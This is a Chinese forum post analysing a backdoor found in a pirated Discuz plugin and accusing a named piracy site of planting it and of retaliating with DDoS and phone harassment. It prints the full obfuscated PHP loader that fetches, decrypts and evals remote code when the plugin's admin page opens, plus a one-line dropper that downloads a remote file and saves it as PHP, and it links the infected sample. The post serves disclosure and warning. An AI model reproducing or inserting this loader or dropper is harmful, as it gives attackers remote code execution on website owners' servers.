|
|
上次寫了一篇文章 披露了盜版市場的亂象 ,沒想到本人遭到魔趣吧的站長瘋狂的報復。我自己的網站已經持續快10天被魔趣吧的站長使用DDOS攻擊技術,打不開了!因為在其網站進行了手機綁定,手機也整天被短信+電話轟炸!搞的我最近經常要開飛行模式!
但是我是絕對不會像黑惡勢力低頭的,大不了我網站不做了,手機號碼不用了!
因為前面的那篇文章寫的比較概況,沒有列舉證據(導致其大肆誤導不明真相的群眾說我在造謠),今天我就來列舉一些證據,并對已知的后門進行深入詳細的分析!
這可能是最后一篇曝光盜版市場亂象的文章了,因為我只是一個普普通通的站長!那些江湖經驗豐富的站長我惹不起,我也見識了魔趣吧是如果把黑的說成白的!
他的理念就是:只要對他有利的都是好文章,曝光他的都是在造謠他!
在正式進入主題之前,我想在說幾句題外話:先不說他有沒有干些見不得人的事,其損壞原創開發者權益,謀取自己的利益(俗稱:盜版),還有什么資格在那一副正人君子的模樣懟這個懟那個!
【下面才是今天要說的主題】
由于帶后門的資源有點多,今天我就隨便拿個在魔趣吧收費的資源,且我之前安裝過,受害的資源來做分析!
樣本下載鏈接:為了不給他打廣告,帖子ID: 9183 ,知道他網站的隨便打開一個帖子把id換成這個就可以定位到!
因為是VIP資源,所以我分享到了藍奏網盤:https://wws.lanzous.com/iH9IQe6jymf 密碼:c9mx
附件MD5值:C03B189CA9E0EA7F1229F609A48EC705
防止因為我的曝光,他會修改附件,然后狡辯!對本文有異議的朋友可以在本文發布不久的時候,前去下載對比MD5值后,并效驗是不是存在本文提到的后門木馬!
樣本插件名稱:積分提現中心 V1.2
木馬文件所在路徑:keke_tixian\function\function_core.php
木馬完整代碼:
- <?php
- function zm_diconv($str){
- $encode = mb_detect_encoding($str, array(
- "ASCII",
- "UTF-8",
- "GB2312",
- "GBK",
- "BIG5"
- ));
- if ($encode != CHARSET) {
- //$keytitle = iconv($encode,CHARSET."//IGNORE",$str);
- $keytitle = mb_convert_encoding($str, CHARSET, $encode);
- }
- if (!$keytitle) {
- $keytitle = $str;
- }
- return $keytitle;
- }
- function caidi($oo){
- $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
- $forver=stripos($love,'d');
- $forvere=stripos($love,'z');
- $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
- $forveres='DECODE';
- $aini=substr($love,$forver,$forvere);//獲取方法函數名decrypt
- $aini=$oo?$forveres:$aini;
- return $aini;
- }
- function decrypt($data, $key = '721520') {
- global $_G;
- $key = $key ? $key : $_G['config']['security']['authkey'];
- $type = caidi($key);
- return authcode($data,$type, $key);
- }
- function contentz($svip) {
- if(function_exists('file_get_contents')) {
- $data = file_get_contents($svip);
- } else {
- $ch = curl_init();
- $timeout = 5;
- curl_setopt ($ch, CURLOPT_URL, $svip);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
- $data = curl_exec($ch);
- curl_close($ch);
- }
- return $data;
- }
- $iloveyou = caidi($oo);
- eval($iloveyou(strip_tags(contentz($love))));
- ?>
- $iloveyou = caidi($oo);
- eval($iloveyou(strip_tags(contentz($love))));
有了這些信息 我們下面進行分析(在這里大膽的猜測一下:文件完全是魔趣吧自己加進去的,正版可能就沒有這個文件,因為這個文件代碼全是和后門有關!和插件自身功能沒有關系)
在關鍵代碼前面的都是木馬偽裝所需要用到的函數 執行過程如下:
1/----------------------
后門腳本執行入口:keke_tixian\admin.inc.php
關鍵代碼在該文件第7行:引用后門文件并執行
require_once DISCUZ_ROOT .'./source/plugin/keke_tixian/function/function_core.php';
解釋:只要安裝插件一打開后臺的插件設置,木馬就自動執行了!
2/--------依次執行----------
$iloveyou = caidi($oo);
解釋:定義一個名為 iloveyou 的變量 ,值為: caidi($oo)
調試: $iloveyou = caidi($oo); echo $iloveyou.$love; exit; ,得到 iloveyou 的值等于:decrypt
備注:函數 caidi 定義并賦值了 $love 作全局變量, love 的值等于:htt去p://zonekey.w掉in/b中ai文duseo.xml (去掉中文)
3/--------依次執行----------
eval($iloveyou(strip_tags(contentz($love))));
解釋:已知 iloveyou 的值等于:decrypt,得到 eval(decrypt(strip_tags(contentz(htt去p://zonekey.w掉in/b中ai文duseo.xml))));
分析函數 contentz 得知該函數 是訪問遠程鏈接并返回內容,相當于 curl
分析函數 decrypt 得知該函數 是進行內容解密,直接調用了DISCUZ自帶的解密函數 authcode
解釋的解釋:代碼 eval($iloveyou(strip_tags(contentz($love)))); ,經過層層分析,最終為:
執行腳本 ( 解密 ( 訪問遠程代碼 ( htt去p://zonekey.w掉in/b中ai文duseo.xml ) ) ) );
4/--------依次執行----------
因 htt去p://zonekey.w掉in/b中ai文duseo.xml 該鏈接現在訪問返回的全部是 1111111111111111,所以無法繼續分析遠程的代碼是什么!
可能魔趣吧站長已經知道我接下來會深入曝光他。所以暫時把遠程代碼先全部改成了 1111111111111111
即使是這樣!又如何? 執行遠程腳本 有什么危害?相信做網站的都知道!這里我不進行科普!感興趣的站長可以百度自行科普:例:一句話木馬,菜刀!
下面的代碼是我網站自動多出來的一個文件:因為無法繼續分析,直接看結果
- <?php
- file_put_contents("schizwcingu.php",file_get_contents("http://iqqvps.com/xss.txt"));
End/--------刨根問底--------
在前面一篇文章中提到過了 魔趣吧站長聲稱該木馬是源碼哥的!
但是既然干了,就干到底!
百度了一下 搜索 到 源碼哥 ,在他網站搜索 了一下 積分提現中心 果然找到一個一模一樣的版本!
花了20塊錢下載下來(真黑啊,1.2 這么舊的版本還賣20),不過花20塊錢 能讓大家看清,防止中木馬。也值得!
結局打臉: 沒有 keke_tixian\function\function_core.php 這個文件,因為是邊寫邊弄的,既然寫好了就這樣吧!
雖然沒有發現木馬,但是應該也是一丘之貉,還是呼吁大家不要用盜版!不要用盜版!不要用盜版!
PS:對魔趣吧站長傳播木馬,DDOS我的網站,短信+電話轟炸我的手機號 表示非常的鄙視!
希望官方管理員能夠曝光這篇文章,讓更多準備用盜版的站長、已經在用盜版的站長。趕緊回頭是岸!
樣本已經上傳到藍奏網盤,文章寫的不到位的地方,歡迎各路大神補充!
|
|
關注公眾號
有償服務微信
有償服務QQ
皖公網安備34010302002376號 )|網站地圖|
發表于 2020-6-30 20:23:56
發表于 2020-6-30 20:53:04